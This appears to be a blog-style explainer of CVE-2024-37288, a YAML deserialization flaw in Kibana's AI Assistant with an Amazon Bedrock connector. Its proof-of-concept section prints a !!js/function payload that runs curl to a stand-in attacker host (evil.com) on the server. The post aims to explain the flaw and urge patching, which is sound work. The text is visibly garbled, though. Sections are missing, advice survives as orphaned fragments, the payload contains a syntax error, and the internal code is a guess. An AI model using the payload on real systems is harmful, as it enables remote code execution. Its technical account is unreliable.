CVE-2024-37288 - How a Deserialization Bug in Kibana’s AI Integration Can Lead to Code Execution

A new security vulnerability, CVE-2024-37288, has been discovered in Kibana, a popular dashboard for Elasticsearch. This critical bug can lead to remote code execution (RCE) if you use Elastic Security’s built-in AI tools and have connected Kibana to Amazon Bedrock via their official connector. In this post, we'll break down what this means, how the flaw works, and show you an example exploit, all in simple terms.

1. What Exactly is CVE-2024-37288?

CVE-2024-37288 is a _deserialization_ vulnerability. In plain language, this means Kibana tries to turn user-supplied data (in this case, YAML documents) into objects it can use in the code. If someone sends a “bad” or crafted input, they can trick Kibana into running code or commands they choose.

Affected features and requirements

- You must be using Elastic Security’s AI tools.
- You must have configured an Amazon Bedrock connector.

2. How Does the Vulnerability Happen? (Technical View)

When you use Elastic Security’s AI Assistant and connect to Amazon Bedrock, the assistant accepts YAML inputs from users. The vulnerable code attempts to load that YAML into objects _without filtering or sanitizing dangerous payloads_.

In JavaScript (Node.js)—the language Kibana uses—this often involves a library like js-yaml. A malicious YAML payload can abuse _custom tags_ or unsafe object types that, when parsed, could execute code or spawn network connections.

The assistant passes that YAML document to the backend for processing.

- Kibana loads/parses YAML unsafely.

3. Example Exploit — Proof of Concept

Suppose an attacker has access to a user account that can use the AI Assistant. That attacker submits the following YAML:

!!js/function >
  function() {
    require('child_process').exec('curl http://evil.com/?pwnd=1';);
  }()

If Kibana’s YAML parser supports the !!js/function tag (as in the default js-yaml library), the snippet above will execute the curl command on the server, “calling home” to the attacker's website.

> Note: You should never run untrusted YAML like this! The example is for educational purposes only.

In Code (What Kibana Might Be Doing Internally)

const yaml = require('js-yaml');

function handleInput(userYaml) {
  // UNSAFE: Loads ANY YAML tags, including functions
  const obj = yaml.load(userYaml); 
  // ... use obj in business logic
}

4. Real-World Attack Scenario

If you use Amazon Bedrock through Kibana’s assistant, and your team can provide their own prompts or data via YAML, an attacker could sneak in a payload like the above. Once the document gets parsed, they’ll be able to execute arbitrary code on your Kibana server.

You allow users to provide YAML (prompts or files).

If you only use Kibana for dashboards, or don’t use AI Assistant integrations, you’re safe.

Adding input validation or limiting YAML input strictly to safe types.

When a patch is available, update Kibana immediately.

7. References & Additional Reading

- Elastic Security’s AI Tools
- How to Connect to Amazon Bedrock
- js-yaml npm documentation
- Common JavaScript YAML Security Pitfalls

8. The Takeaway

CVE-2024-37288 is a reminder: never trust data from users, and be careful when parsing formats like YAML that can hide code hooks. If you use advanced AI features in Elastic’s security stack, make sure you patch as soon as possible—or, at a minimum, limit who can provide input.

Stay safe, keep Kibana updated, and audit your integrations!

*Share this article to help your colleagues secure their Elastic stack before attackers do.*

Timeline

Published on: 09/09/2024 09:15:02 UTC
Last modified on: 09/16/2024 13:29:06 UTC